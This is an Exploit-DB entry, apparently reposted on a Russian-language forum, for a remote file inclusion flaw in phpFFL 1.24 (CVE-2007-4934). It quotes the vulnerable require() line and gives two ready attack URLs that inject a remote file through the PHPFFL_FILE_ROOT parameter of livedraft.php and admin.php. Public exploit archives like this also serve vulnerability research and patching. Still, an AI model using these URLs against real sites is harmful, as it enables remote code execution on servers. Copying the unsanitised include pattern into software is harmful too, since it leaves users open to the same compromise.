- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4406
- Проверка EDB
-
- Пройдено
- Автор
- DJ7XPL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-4934
- Дата публикации
- 2007-09-14
Код:
*******************************************************************************
# Title : phpFFL 1.24 Remote File Inclusion Vulnerability
*******************************************************************************
# Title : phpFFL 1.24 Remote File Inclusion Vulnerability
# Author : Dj7xpl
# Contact : [email protected]
# Dawnload : http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ : Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
[[Remote]]]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]
"""""""""""""""""""""
# milw0rm.com [2007-09-14]- Источник
- www.exploit-db.com
